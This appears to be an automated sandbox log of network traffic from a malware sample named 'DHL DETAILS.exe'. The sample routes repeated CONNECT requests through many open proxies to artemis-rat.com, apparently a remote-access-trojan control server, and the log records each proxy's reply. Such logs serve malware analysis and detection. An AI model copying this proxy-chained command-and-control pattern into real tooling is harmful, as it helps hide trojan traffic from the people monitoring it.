                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.420413971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.574820042 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1029192.168.2.55312446.51.249.13531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.425056934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.695213079 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1030192.168.2.55325645.43.239.168270706352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.434493065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1031192.168.2.55318595.164.207.157583786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.436471939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1032192.168.2.553260162.214.103.84147226352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.436767101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.973993063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.568030119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.677238941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.868587017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.145329952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1033192.168.2.55253151.38.63.124272946352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.441337109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.536441088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1034192.168.2.55306547.96.145.1488886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.442466021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.795603037 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1035192.168.2.553242162.241.46.6643536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.442759991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.036393881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.724183083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036603928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.520987988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.020785093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.411216974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.333631992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1036192.168.2.553057183.230.162.12290916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.444636106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.822798014 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1037192.168.2.553130188.166.17.1888816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.469944954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1038192.168.2.553054103.190.54.14180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.472445011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1039192.168.2.55313151.210.223.930006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.473820925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1040192.168.2.55311958.234.116.19781976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.473905087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1041192.168.2.553128203.218.172.22580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.484255075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1042192.168.2.553047122.114.232.1378086352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.500627995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1043192.168.2.553179198.105.101.12957586352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.500941038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.019242048 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1044192.168.2.550850154.118.228.212806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.501370907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1045192.168.2.553286172.67.182.96806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.505125999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.659395933 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1046192.168.2.55318818.169.83.8710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.505800009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.796792984 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1047192.168.2.55094552.80.19.20731286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.507606030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1048192.168.2.553144159.223.71.71543706352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.512695074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.223916054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.333384037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1049192.168.2.55099546.241.57.2910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.518398046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1050192.168.2.550432103.97.179.11510806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.522985935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1051192.168.2.55315643.133.70.57156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.522986889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1052192.168.2.5531368.222.164.205156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.523921013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1053192.168.2.55318634.92.12.21092386352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.528028011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.838654995 CET28INHTTP/1.1 502 Bad Gateway


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1054192.168.2.553206221.153.92.39806352C:\Users\user\Desktop\DHL DETAILS.exe
